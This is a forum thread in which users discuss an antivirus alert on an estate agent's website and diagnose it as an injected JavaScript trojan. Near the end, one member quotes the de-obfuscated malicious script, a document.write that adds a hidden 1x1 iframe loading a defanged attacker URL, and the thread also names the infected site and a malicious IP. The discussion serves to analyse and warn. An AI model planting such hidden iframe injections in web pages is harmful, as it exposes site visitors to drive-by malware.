Trojan Blocked

jim22

Hello, avast free has just reported that it has blocked this Trojan- JS IFRAME-AC TRJ

EXPLORE\IEXPLORE.EXE

If this is real and not a false positive why on earth would there be this kind of threat on the pages of a south wales estate agent?

Do the devils who put these threats on sites just choose indiscriminately? How do they put them there? Thanks.

stilltheone

Some websites are easier to hack than others?

spg_SCOTT

It is not an alert on "EXPLORE\IEXPLORE.EXE" (i.e. internet explorer) That is just the process that is accessing the site.

It is an alert on whatever site you are browsing.

If you post the site link but make it unclickable by changing http to hXXp I could take a look.

jim22

Thanks Scott- hxxp://www.curatech.net/evansjones/ they are an estate agents in kenfig hill bridgend

RussJK

jim22 wrote: »

Thanks Scott- hxxp://www.curatech.net/evansjones/ they are an estate agents in kenfig hill bridgend

Links to 89.208.149.214, which is presumably the site that caused the trojan to download. You're lucky that Avast was able to detect it.

Might be worth a quick scan with Malwarebytes in case you also downloaded something that wasn't detected.

spg_SCOTT

Not a false positive, detection is correct.

Just for info, the source of the site in a text file:
http://www.virustotal.com/file-scan/report.html?id=d23a63b99af1fa96fea2edeb0d3d484db9e4c399222540cc0d5fd3f0e53124e3-1308088565

At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

This also exists on the home page, (no evansjones on the url) so is proably elsewhere in the site too...

jim22

Thanks scott, ive run a malwarebytes scan which reports nothing. Any idea how or why this infection is lodged on this site?

asbokid

Hi Jim!

Because of the nature of http (the web protocol), objects referenced in a webpage are often hosted off-site..

All that is needed is an attack vector in a remotely-hosted object. That could be a maliciously crafted
image that crashes the image rending software on your PC which allows 'the execution of arbitrary code'.

This image here, for example... it could be hosted on MSE.COM, or evansjones.com, but it's actually hosted on number10.gov.uk! Unless you disable the display of all images in your browser, or you scrutinise every image before it is downloaded and displayed, there is no way of telling whether it has malicious content.

RussJK

spg_SCOTT wrote: »

Just for info, the source of the site in a text file:
http://www.virustotal.com/file-scan/report.html?id=d23a63b99af1fa96fea2edeb0d3d484db9e4c399222540cc0d5fd3f0e53124e3-1308088565

Sure makes an argument against the strength of "common sense" in protecting against viruses, seeing how few detect obfuscated code...

jim22

Thanks everybody. Should I ring this estate agent and tell them that their site is infected for the benefit of their customers. Mind you, they might blame me.

asbokid

spg_SCOTT wrote: »

At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

De-obfuscated, that script reads...

document.write('<iframe src="hxxp://sivassigorta.com/forum.php?tp=8c605c6bfdd9b2f5" width="1" height="1" frameborder="0"></iframe>')